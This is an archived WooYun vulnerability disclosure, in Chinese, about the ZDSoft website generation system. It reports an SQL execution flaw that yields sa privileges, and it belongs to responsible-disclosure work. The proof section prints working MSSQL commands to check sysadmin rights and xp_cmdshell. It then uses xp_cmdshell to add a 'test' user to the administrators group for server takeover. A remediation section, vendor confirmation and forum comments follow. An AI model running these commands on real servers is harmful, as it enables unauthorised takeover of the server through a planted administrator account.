当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-037806

漏洞标题:ZDSoft网站生成系统严严重漏洞

相关厂商:ZDSoft网站生成系统

漏洞作者: 李旭敏

提交时间:2013-09-22 20:07

修复时间:2013-12-21 20:07

公开时间:2013-12-21 20:07

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-09-22: 细节已通知厂商并且等待厂商处理中
2013-09-26: 厂商已经确认,细节仅向厂商公开
2013-09-29: 细节向第三方安全合作伙伴开放
2013-11-20: 细节向核心白帽子及相关领域专家公开
2013-11-30: 细节向普通白帽子公开
2013-12-10: 细节向实习白帽子公开
2013-12-21: 细节向公众公开

简要描述:

感谢啊D和肉总的大力帮忙!利用该漏洞可以直接拿下ZDsoft网站生成系统的服务器···

详细说明:

 WooYun: ZDSoft网站生成系统严重漏洞 


如上,进入SQL语句执行的平台···前者说了可以爆出管理密码。而我说的,是直接拿下服务器。

sa.jpg

可以看到是sa权限的···

xp_cmdshell扩展存储是否存在.jpg


判断xp_cmdshell扩展存储是否存在···

xp_regread扩展存储过程是否存在.jpg


继续判断xp_regread扩展存储过程是否存在

.jpg

执行cmd命令看看···

.jpg

添加用户~~

.jpg

加进管理组

.jpg

就这样,根本无需啥后台拿shell,直接就搞定服务器了。

漏洞证明:

.jpg


判断权限是不是sa
select is_srvrolemember('sysadmin')
返回是1说明是sa
判断xp_cmdshell扩展存储是否存在
select count(*) from master.dbo.sysobjects where xtype = 'x' AND name= 'xp_cmdshell'
返回为l则证明存在
判断xp_regread扩展存储过程是否存在
select count(*) from master.dbo.sysobjects where name='xp_regread'
返回1证明存在
添加用户
exec master..xp_cmdshell 'net user test test /add'
exec master..xp_cmdshell 'net localgroup administrators test /add'
后来就是查看3389端口了,
exec master..xp_cmdshell 'XXXXX'里面输入cmd命令就是了
这些是肉肉和我搞了一个上午总结的。还有声明一下,她不是客服,她是技术人员!

修复方案:

.jpg


2.jpg


3.jpg

可以禁止相关的扩展程序。把相关的DLL改名了就执行不了,之后再把相关的扩展名改一下名。或是直接把相关的文件权限禁了!加载过了再设置权限,不会有影响,然后重启一下服务器就行了。
以上是啊D的建议~~~~据说可以防范一般小黑黑。
我个人建议是:如果嫌麻烦的话可以装个D盾,里面有降权的功能。。

版权声明:转载请注明来源 李旭敏@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2013-09-26 22:46

厂商回复:

CNVD确认并复现所述情况,在多个互联网实例上可复现,暂未发现涉及重要和政府部门的案例.由CNVD直接协调软件生产厂商处置.
rank 18

最新状态:

暂无


漏洞评价:

评论

  1. 2013-09-22 20:13 | 肉肉 认证白帽子 ( 普通白帽子 | Rank:112 漏洞数:10 | 肉肉在长亭科技,肉肉在长亭科技,肉肉在长...)

    好吧,沙发

  2. 2013-09-22 20:42 | 老笨蛋 ( 路人 | Rank:29 漏洞数:8 | 老笨蛋一个)

    关注一下。

  3. 2013-09-22 20:47 | 正好五个字 ( 实习白帽子 | Rank:93 漏洞数:15 )

    围观。

  4. 2013-09-22 20:59 | 肉肉 认证白帽子 ( 普通白帽子 | Rank:112 漏洞数:10 | 肉肉在长亭科技,肉肉在长亭科技,肉肉在长...)

    记得分我wb哈,不要独吞,哈哈

  5. 2013-09-22 21:20 | 梧桐雨 认证白帽子 ( 核心白帽子 | Rank:1576 漏洞数:184 | 关注技术与网络安全)

    @肉肉 深藏不露啊

  6. 2013-09-22 21:30 | 肉肉 认证白帽子 ( 普通白帽子 | Rank:112 漏洞数:10 | 肉肉在长亭科技,肉肉在长亭科技,肉肉在长...)

    @梧桐雨 木有。。。木有,我就是小菜鸟,不对,都不小了。。。

  7. 2013-09-22 22:56 | 李旭敏 ( 普通白帽子 | Rank:469 漏洞数:71 | ฏ๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎...)

    @肉肉 行,政府如果找我要地址我就写你的···

  8. 2013-09-22 23:16 | 正好五个字 ( 实习白帽子 | Rank:93 漏洞数:15 )

    @李旭敏 呵呵。想太多了。我会说没奖励的。。

  9. 2013-09-23 09:30 | Mas ( 实习白帽子 | Rank:42 漏洞数:15 )

    有多严重

  10. 2013-09-23 09:56 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @肉肉 我去,什么节奏啊,肉总,人人网那个你是不是故意的!哼哼。。

  11. 2013-09-23 10:26 | 肉肉 认证白帽子 ( 普通白帽子 | Rank:112 漏洞数:10 | 肉肉在长亭科技,肉肉在长亭科技,肉肉在长...)

    @px1624 我木有,我反应慢嘛。。。还被你鄙视

  12. 2013-10-17 12:32 | 正好五个字 ( 实习白帽子 | Rank:93 漏洞数:15 )

    @李旭敏 WooYun: ZDSoft网站生成系统严重漏洞 跟这个有啥区别??

  13. 2013-10-17 20:47 | 李旭敏 ( 普通白帽子 | Rank:469 漏洞数:71 | ฏ๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎...)

    @正好五个字 如上,进入SQL语句执行的平台···前者说了可以爆出管理密码。而我说的,是直接拿下服务器。文中有提到,谢谢···

  14. 2013-12-21 23:26 | 花少也是War ( 路人 | Rank:0 漏洞数:2 | 我是小屁孩)

    我无语,这能过?你又不是这洞的原创者,有sql执行平台,谁不会用xp_cmdshell执行命令,这个我早试过了。

  15. 2013-12-22 20:10 | 李旭敏 ( 普通白帽子 | Rank:469 漏洞数:71 | ฏ๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎...)

    @花少也是War 呵呵,乌云网有不少提交的漏洞是一些分站用了某些开源的CMS,比如之前的织梦注入,你不如说一句,如果知道是织梦的,谁不会利用exp来注入?我开头第一句就说了,前者说的是爆出管理密码,后者是直接拿下服务器,我是不是没关系,漏洞不是我一个人发现的。审核漏洞的管理和厂商觉得这是漏洞,你又有什么好说的?

  16. 2013-12-27 12:03 | 花少也是War ( 路人 | Rank:0 漏洞数:2 | 我是小屁孩)

    @李旭敏 好吧,我是彩笔。希望没惹到你